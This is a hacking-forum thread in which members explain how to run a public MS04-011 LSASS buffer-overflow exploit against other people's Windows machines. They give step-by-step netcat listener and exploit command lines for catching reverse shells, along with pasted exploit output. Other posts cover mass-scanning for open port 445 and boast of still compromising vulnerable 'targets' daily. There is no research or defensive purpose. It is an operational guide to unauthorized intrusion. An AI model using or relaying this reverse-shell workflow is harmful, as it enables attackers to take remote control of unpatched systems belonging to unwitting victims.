Full Version: Lsass Cmd Line
You have to run netcat before you exploit the target.
Run NetCat like this: nc -l -vv -p PORT
FIRST STEP:
Open a cmd.exe, browse to your netcat dir and type: nc.exe -l -p "the port that will open on your computer"
SECOND STEP:
Open another cmd.exe, browse to the exploit, and then type: "name of the exploit.exe" "0, 1, depending on the vic's OS" "vic's IP" "the port that you opened seconds before with nc.exe" "your IP"
If you're able to connect to his port 445 (most of the time it's ok), then you should get something coming in your first cmd.exe, the one in which you opened a port thanks to nc.exe.
I hope this helps "a bit" those who aren't used to "reverse" exploits.
Thanks Macsou, I'll test it on my machines...
Nothing special happening... same shellcode size 316 and ret value 1726 all the time...
Getting no shell... any more suggestions?
Run your own thread if you have problems; this doesn't match the topic.
This exploit is almost dead, everyone's patched.
Still many shells here..
Happy hunting ;-)
@o0oKARo0o
This exploit is alive and kickin'; I'm still getting a few *good* vuln targets every day.
Damn, guys, where are we? In Offtopic?
EXPLOiTED wants to know if there is a command-line scanner for LSASS, and I think it wasn't his intention to start another newbie-like "I don't get a shell, shall I reboot my PC to get it to work?" thread. I mean guys, when you want some help, ask your mom, but when you want to contribute and help this guy, post something here! Else: RTFM! My two cents...
PS: Sorry, no, I don't know a command-line scanner either, and I would like to know too if there is one.
The link isn't working... can anyone give another one?
Thanks in advance, AsD10
Check that site, they have some interesting stuff:
http://www.mosbatonline.com/hck/download.htm
Now it's dead.
God damn, who did the translation at this site...
Seems like another AltaVista translate job.
Can we get back on topic... CMDLiNE SCANNER... I have Dsscan, I have scanned ports 139 and 445 (METALHEAD), that doesn't help... I don't feel like re-scanning those ranges once again when I find the ones with those ports open... METALHEAD.. anywho... can we get back on topic, just in case someone reads this and says "OMFG WTF are these morons babbling about" when they could be like "ooooh cmdline scanner ----> link" and I'd be happy.
yes MERKiN METALHEAD :-P
I've certainly not found a cmd line scanner anywhere, but I'm sure there is great need for one... I'll keep looking... can only hope!
Can anybody upload the Rlsasrv exploit from the first site of this thread for me please! Thanks! Or mail me: g33k@mail.ru
@first: use a remote command-line scan tool like scan500 or sl.exe to make a simple port scan for port 445, next check the fitting results locally via dsscan.
That's my way. In the vuln results, you may find ~10 percent which are dropping a shell, depends on the installed Windows version ;o) Good luck.
Can anyone upload Rlsasrv.zip? I have another one that doesn't seem to work.
What's the problem:
C:\lsass>RLsasrv.exe 0 attackip 666 myip
Create NULL session failed
shellcode size 316
Ret value = 58
o_O
LSASS is shit, all systems are patched!!!!!
You really think so?
cmd1:
c:\>exploit 0 192.168.0.2 4444 192.168.0.1
MS04011 Lsasrv.dll RPC buffer overflow remote exploit v0.1
--- Coded by .::[ houseofdabus ]::. ---
[*] Target: IP: 192.168.0.2: OS: WinXP Professional [universal] lsass.exe
[*] Connecting to 192.168.0.2:445 ... OK
[*] Attacking ... OK
-------------------------------------------------------------
cmd2:
nc -l -p 4444
-------------------------------------------------------------
Then what? Why does nothing happen in cmd2? I have the firewall turned off.
Put netcat to listen on the port first and then use the sploit. Also it's possible that the machine isn't vulnerable.
first
second
third got backshell
Do you have another problem?
CMD1:
C:\>nc -vv -l -p 21
listening on [any] 21 ...
-----------------------------------------------------------------------
CMD2:
C:\>exploit 2 192.168.0.2 21 192.168.0.1
MS04011 Lsasrv.dll RPC buffer overflow remote exploit v0.1
--- Coded by .::[ houseofdabus ]::. ---
[*] Target: IP: 192.168.0.2: OS: Win2k Advanced Server [SP4] netrap.dll
[*] Connecting to 192.168.0.2:445 ... OK
[*] Attacking ... OK
C:\>
-----------------------------------------------------------------------
CMD3:
C:\>nc -vv -l -p 21
listening on [any] 21 ...
-----------------------------------------------------------------------
Still no response...
Just gotta keep trying, you'll get one.
I thought I was doing it wrong at first because I wasn't getting shells, but after a while I got one that worked. Don't forget about the -t option that will check the OS. Then you can choose according to the OS. Laters...
Also this might be of help... Searching around I find this: